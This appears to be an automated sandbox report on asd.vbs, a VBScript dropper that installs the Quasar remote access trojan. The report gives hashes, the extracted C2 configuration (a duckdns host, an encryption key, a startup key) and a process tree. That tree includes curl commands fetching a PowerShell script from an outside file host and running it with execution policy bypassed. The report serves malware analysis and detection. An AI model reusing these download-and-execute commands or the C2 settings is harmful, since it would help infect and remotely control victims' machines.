Analysis

  • max time kernel
    36s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/01/2023, 09:37

General

  • Target

    asd.vbs

  • Size

    484B

  • MD5

    1663574ead24fc758c224a04057e9da3

  • SHA1

    c2fb493d802d82d93cbb139ab3c3899c31a68bc4

  • SHA256

    7bf8ea91da860789333adacd1cc7b26ffb593dfe6ebab4651a789bf47d0b92ba

  • SHA512

    ab1d8b4e67f5b9772e2a34ce7ab5695f604fc510d255fdad3b12d1a0c2793c2706172d2f84a29e67f239cf951b328fab30e273b1ee383cee2db4add9704f3840

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

ghcc.duckdns.org:4782

Mutex

a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b

Attributes
  • encryption_key

    B0326395AC2D48856CAE22978A087DF5DCF5816D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4956
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4624
      • C:\Windows\system32\cmd.exe
        cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2460
        • C:\Windows\system32\curl.exe
          curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
            PID:628
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2256
        • C:\Windows\system32\cmd.exe
          cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5092
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3384
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1128

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\rr.ps1

      Filesize

      5.1MB

      MD5

      7aad8bcb11ff3deab23cc311222fe265

      SHA1

      3d9a69c71e00aff947af949441220f18bad9e0d8

      SHA256

      c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a

      SHA512

      f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9

    • memory/1128-141-0x0000000000400000-0x0000000000484000-memory.dmp

      Filesize

      528KB

    • memory/1128-150-0x0000000007820000-0x0000000007886000-memory.dmp

      Filesize

      408KB

    • memory/1128-149-0x0000000006480000-0x0000000006532000-memory.dmp

      Filesize

      712KB

    • memory/1128-148-0x0000000006250000-0x00000000062A0000-memory.dmp

      Filesize

      320KB

    • memory/1128-147-0x0000000006820000-0x0000000006E38000-memory.dmp

      Filesize

      6.1MB

    • memory/1128-145-0x00000000055A0000-0x0000000005632000-memory.dmp

      Filesize

      584KB

    • memory/1128-146-0x0000000005500000-0x000000000550A000-memory.dmp

      Filesize

      40KB

    • memory/1128-144-0x0000000005B50000-0x00000000060F4000-memory.dmp

      Filesize

      5.6MB

    • memory/3384-140-0x00007FFC46E80000-0x00007FFC47941000-memory.dmp

      Filesize

      10.8MB

    • memory/3384-143-0x00007FFC46E80000-0x00007FFC47941000-memory.dmp

      Filesize

      10.8MB

    • memory/3384-138-0x0000019ECFD30000-0x0000019ECFD52000-memory.dmp

      Filesize

      136KB